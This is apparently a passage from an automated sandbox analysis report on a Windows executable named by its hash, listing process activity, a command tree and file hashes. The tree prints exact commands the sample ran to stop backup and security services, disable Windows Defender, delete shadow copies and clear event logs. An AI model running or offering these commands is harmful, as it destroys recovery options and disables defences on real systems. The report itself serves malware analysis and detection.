4384 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 4384 wrote to memory of 4464 4384 net.exe net1.exe PID 4384 wrote to memory of 4464 4384 net.exe net1.exe PID 4384 wrote to memory of 4464 4384 net.exe net1.exe PID 3384 wrote to memory of 4444 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4444 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4444 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 4444 wrote to memory of 4344 4444 net.exe net1.exe PID 4444 wrote to memory of 4344 4444 net.exe net1.exe PID 4444 wrote to memory of 4344 4444 net.exe net1.exe PID 3384 wrote to memory of 4324 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4324 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4324 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 4324 wrote to memory of 4420 4324 net.exe net1.exe PID 4324 wrote to memory of 4420 4324 net.exe net1.exe PID 4324 wrote to memory of 4420 4324 net.exe net1.exe PID 3384 wrote to memory of 3800 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 3800 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 3800 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3800 wrote to memory of 4308 3800 net.exe net1.exe PID 3800 wrote to memory of 4308 3800 net.exe net1.exe PID 3800 wrote to memory of 4308 3800 net.exe net1.exe PID 3384 wrote to memory of 3076 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 3076 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 3076 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3076 wrote to memory of 512 3076 net.exe net1.exe PID 3076 wrote to memory of 512 3076 net.exe net1.exe PID 3076 wrote to memory of 512 3076 net.exe net1.exe PID 3384 wrote to memory of 652 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3384 wrote to memory of 652 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3384 wrote to memory of 652 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3384 wrote to memory of 3260 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3384 wrote to memory of 3260 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3384 wrote to memory of 3260 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3384 wrote to memory of 1032 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3384 wrote to memory of 1032 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3384 wrote to memory of 1032 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3384 wrote to memory of 1244 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:4240
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2008
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:4288
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:4404
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:4464
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:4344
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:4420
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:4308
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_12cea" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12cea" /y3⤵PID:512
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:652
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:3260
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1032
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1244
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1508
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1784
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1284
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2348
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_12cea" start= disabled2⤵PID:2584
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2768
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3156
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3244
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:4836
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1148
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4976
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2000
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:4960
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4864
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:4580
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3196
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:4912
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2688
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1060
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:884
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1044
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2496
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:4788
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:924
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2544
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1340
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1516
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1776
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2172
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2020 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2292 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3112 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3836
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1616
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1564
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3844
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1864 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4372
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2192 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4000 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4092 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3128 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4316 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:736
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4344 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:4356
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3280 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1544
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2148
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5
4dead21eadbf49fd5eb9883f0504c894
SHA1b39d0806a2de4fa89d2e50394bcd9e02e7bebd5f
SHA2561b526fe2bcaad9a0794d2ed8069bf860d0ac9d6184f17ef59dd41893eb4031da
SHA512e48b5b353ac29099090653a9770592e9bbb8d7eece0125ddf47f939812bcdd1fc7e98b84825de15fd01ed3713a8b966489657a6a83857a32a3f94f60374ef56a